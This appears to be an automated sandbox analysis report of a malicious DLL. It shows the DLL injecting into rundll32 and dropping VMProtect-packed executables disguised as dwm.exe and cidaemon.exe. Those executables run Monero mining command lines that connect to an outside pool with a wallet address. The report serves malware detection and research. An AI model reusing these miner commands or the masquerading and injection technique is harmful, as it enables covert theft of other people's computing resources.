Analysis
max time kernel: 151s
max time network: 130s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-11-2022 07:59

Static task: static1

Behavioral task: behavioral1
Sample: 41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
Resource: win7-20220901-en

Behavioral task: behavioral2
Sample: 41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
Resource: win10v2004-20220901-en
General
Target: 41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
Size: 4.6MB
MD5: f42201e1867d4b345373296577d40035
SHA1: b691363aa20b1d7681c7557a6aa40f3596416555
SHA256: 41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea
SHA512: 4fac587eaa45e085b210b55164f928493af98911addc429772e5a45d5b205635ff846264a07e529a5d13d20f0b7ac2042139f44a036c3a2dae6f933f307461e6
SSDEEP: 98304:4STCsrzPn/z33xlGTvgLkbYWtYAMrbL3uxEqO0c5l:4SpzP/z378vokb8AMrbL+xEj0cT
Malware Config
Signatures
Executes dropped EXE (2 IoCs)
Processes:
  pid   process
  2140  dwm.exe
  4416  cidaemon.exe

Processes:
  resource                                                                      yara_rule
  C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe                     vmprotect
  C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe                     vmprotect
  C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe                          vmprotect
  behavioral2/memory/4416-139-0x00007FF613CA0000-0x00007FF61406F000-memory.dmp  vmprotect
  behavioral2/memory/2140-140-0x00007FF7573D0000-0x00007FF75777D000-memory.dmp  vmprotect
  C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe                          vmprotect
  behavioral2/memory/2140-143-0x00007FF7573D0000-0x00007FF75777D000-memory.dmp  vmprotect
  behavioral2/memory/2140-144-0x00007FF7573D0000-0x00007FF75777D000-memory.dmp  vmprotect
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
Processes:
  pid   process
  2140  dwm.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
  pid   process
  4844  rundll32.exe  (64 identical entries)
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description                   pid   process
  Token: SeLockMemoryPrivilege  2140  dwm.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
  pid   process
  4844  rundll32.exe
  4844  rundll32.exe
Suspicious use of WriteProcessMemory (7 IoCs)
Processes:
  description                      pid   process       target process
  PID 4944 wrote to memory of 4844  4944  rundll32.exe  rundll32.exe
  PID 4944 wrote to memory of 4844  4944  rundll32.exe  rundll32.exe
  PID 4944 wrote to memory of 4844  4944  rundll32.exe  rundll32.exe
  PID 4844 wrote to memory of 2140  4844  rundll32.exe  dwm.exe
  PID 4844 wrote to memory of 2140  4844  rundll32.exe  dwm.exe
  PID 4844 wrote to memory of 4416  4844  rundll32.exe  cidaemon.exe
  PID 4844 wrote to memory of 4416  4844  rundll32.exe  cidaemon.exe
Processes
C:\Windows\system32\rundll32.exe
  command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll,#1
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\rundll32.exe
    command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll,#1
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
      command line: C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.2
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe
      command line: C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.3
      - Executes dropped EXE
Downloads
C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe
  Filesize: 1.6MB
  MD5: 69e6e75f2219d64f3c776d2ef313b9ff
  SHA1: 211042ac764db953ca0c54117aff8e241d86e4fe
  SHA256: 09bb784499c13f9a43548d0e660ba4e5f009f06f5d5da5d57d11a1b4aceb1f8a
  SHA512: fa77b1bcc58d150df3e68fc64373302f71e2abcc058e0f6a1e29cfa44336146d8aa299c54bbc77e2ff877f0179a4429dcf01b841ede0379a8c7236fbab820410
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
  Filesize: 1.5MB
  MD5: eedb9d86ae8abc65fa7ac7c6323d4e8f
  SHA1: ce1fbf382e89146ea5a22ae551b68198c45f40e4
  SHA256: d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
  SHA512: 9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
memory/2140-133-0x0000000000000000-mapping.dmp
memory/2140-140-0x00007FF7573D0000-0x00007FF75777D000-memory.dmp (Filesize: 3.7MB)
memory/2140-143-0x00007FF7573D0000-0x00007FF75777D000-memory.dmp (Filesize: 3.7MB)
memory/2140-144-0x00007FF7573D0000-0x00007FF75777D000-memory.dmp (Filesize: 3.7MB)
memory/4416-139-0x00007FF613CA0000-0x00007FF61406F000-memory.dmp (Filesize: 3.8MB)
memory/4416-135-0x0000000000000000-mapping.dmp
memory/4844-132-0x0000000000000000-mapping.dmp